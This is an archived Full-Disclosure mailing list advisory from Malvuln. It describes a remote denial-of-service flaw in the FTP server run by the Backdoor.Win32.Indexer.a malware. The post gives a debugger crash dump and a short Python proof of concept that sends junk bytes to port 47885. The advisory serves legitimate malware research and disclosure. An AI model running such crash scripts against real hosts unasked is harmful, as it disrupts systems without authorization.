lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 16 Feb 2021 00:04:32 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Indexer.a / Remote Denial Of Service

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/2b576e7551afe1c7575dc680396f1b5b_B.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Indexer.a
Vulnerability: Remote Denial Of Service
Description: Indexer.a runs an FTP server that listens on TCP port
47885, sending an unexpected payload of junk chars causes an exception
resulting in a crash an denial of service.
Type: PE32
MD5: 2b576e7551afe1c7575dc680396f1b5b
Vuln ID: MVID-2021-0092
Dropped files:
Disclosure: 02/16/2021

Memory Dump:
(1618.14b0): Unknown exception - code 0eedfade (first/second chance
not available)
eax=00000000 ebx=00000000 ecx=00000007 edx=00000000 esi=00000003 edi=00000003
eip=7710ed3c esp=0019f460 ebp=0019f5f0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400          ret     14h

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP:
KERNELBASE!RaiseException+62
75eb08f2 8b4c2454        mov     ecx,dword ptr [esp+54h]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062)
   ExceptionCode: 0eedfade
  ExceptionFlags: 00000001
NumberParameters: 7
   Parameter[0]: 004129ae
   Parameter[1]: 04105d4c
   Parameter[2]: 04105dc8
   Parameter[3]: 00000000
   Parameter[4]: 00000000
   Parameter[5]: 0019fe9c
   Parameter[6]: 0019fddc

DEFAULT_BUCKET_ID:  DELPHI_EXCEPTION

PROCESS_NAME:  Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

ERROR_CODE: (NTSTATUS) 0xeedfade - <Unable to get error code text>

EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - <Unable to get error code text>

EXCEPTION_PARAMETER1:  004129ae

EXCEPTION_PARAMETER2:  04105d4c

EXCEPTION_PARAMETER3:  04105dc8

EXCEPTION_PARAMETER4: 0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  000014b0

PRIMARY_PROBLEM_CLASS:  DELPHI_EXCEPTION

BUGCHECK_STR:  APPLICATION_FAULT_DELPHI_EXCEPTION

LAST_CONTROL_TRANSFER:  from 00443345 to 75eb08f2

STACK_TEXT:
0019fdf0 00443345 041050ac 041050ac 0044317f KERNELBASE!RaiseException+0x62
WARNING: Stack unwind information not available. Following frames may be wrong.
0019fe14 0040c70b 0040ba01 04102c70 00443345
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe20 00443345 04102c70 04102c70 0044317f
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!FtpsrvTFtpServer$bdtr$qqrv+0x47
0019fe2c 0044317f 00000000 0019fe9c 00000000
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe44 004311ea 04102200 00000001 0044c7a9
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x2fe43
0019fe50 0044c7a9 0041c253 04102c70 04102c70
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x1deae
0019fe54 0041c253 04102c70 04102c70 04102c70
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x3946d
0044c7a9 52ff108b 84c358e4 c3017fd2 108b5250
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x8f17
0044c7ad 84c358e4 c3017fd2 108b5250 5ae852ff 0x52ff108b
0044c7b1 c3017fd2 108b5250 5ae852ff 8090c358 0x84c358e4
0044c7b5 108b5250 5ae852ff 8090c358 45a9b03d 0xc3017fd2
0044c7b9 5ae852ff 8090c358 45a9b03d 10760100 0x108b5250
0044c7bd 8090c358 45a9b03d 10760100 006a006a 0x5ae852ff
0044c7c1 45a9b03d 10760100 006a006a df68006a 0x8090c358
0044c7c5 10760100 006a006a df68006a e80eedfa 0x45a9b03d
0044c7c9 006a006a df68006a e80eedfa 0000bb7f 0x10760100
0044c7cd df68006a e80eedfa 0000bb7f 809090c3 0x6a006a
0044c7d1 e80eedfa 0000bb7f 809090c3 45a9b03d 0xdf68006a
0044c7d5 00000000 809090c3 45a9b03d 16740000 0xe80eedfa


FOLLOWUP_IP:
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+30009
00443345 8b7310          mov     esi,dword ptr [ebx+10h]

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b

IMAGE_NAME:  Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  3814be7c

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt
ntdll!LdrpFailureData ; ~0s; .ecxr ; kb

BUCKET_ID:  APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FAILURE_BUCKET_ID:
DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe!Ftpsrvcinitialization$qqrv


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=47885

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PBARBAR="A"*256
    s.send(PBARBAR)

    print("Backdoor.Win32.Indexer.a / Remote Dos")
    print("MD5: 2b576e7551afe1c7575dc680396f1b5b")
    print("By Malvuln");

if __name__=="__main__":
    doit()



Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or
otherwise. Permission is hereby granted for the redistribution of this
advisory, provided that it is not altered except by reformatting it,
and that due credit is given. Permission is explicitly given for
insertion in vulnerability databases and similar, provided that due
credit is given to the author. The author is not responsible for any
misuse of the information contained herein and accepts no
responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security
related information or exploits by the author or elsewhere. Do not
attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper
Malware handling or the downloading of ANY Malware mentioned on this
website or elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ